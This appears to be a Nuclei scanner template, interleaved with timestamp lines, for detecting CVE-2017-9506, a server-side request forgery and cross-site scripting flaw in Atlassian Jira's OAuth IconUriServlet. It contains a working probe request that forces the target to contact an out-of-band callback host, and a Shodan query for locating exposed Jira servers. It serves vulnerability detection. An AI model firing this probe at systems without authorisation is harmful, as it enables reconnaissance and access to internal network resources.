2021-01-02 05:02:50 +00:00
id : CVE-2017-9506
2020-04-04 18:19:48 +00:00
info :
2022-08-16 14:14:41 +00:00
name : Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery
2021-04-06 06:46:11 +00:00
author : pdteam
2021-09-10 11:26:40 +00:00
severity : medium
2022-08-16 14:14:41 +00:00
description : The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery.
2021-08-18 11:37:49 +00:00
reference :
2021-04-18 13:00:27 +00:00
- http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
- https://ecosystem.atlassian.net/browse/OAUTH-344
- https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-9506
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-9506
cwe-id : CWE-918
2022-07-04 13:17:32 +00:00
metadata :
shodan-query : http.component:"Atlassian Jira"
2022-04-22 10:38:41 +00:00
tags : cve,cve2017,atlassian,jira,ssrf,oast
2020-04-04 18:19:48 +00:00
requests :
2021-04-18 16:36:07 +00:00
- raw :
- |
2021-06-09 07:41:39 +00:00
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
2021-04-18 16:36:07 +00:00
Host : {{Hostname}}
Origin : {{BaseURL}}
2020-04-04 18:19:48 +00:00
matchers :
- type : word
2022-02-21 18:33:16 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2020-04-04 18:19:48 +00:00
words :
2021-07-03 19:11:57 +00:00
- "http"
2022-08-16 14:14:41 +00:00
# Enhanced by mp on 2022/08/12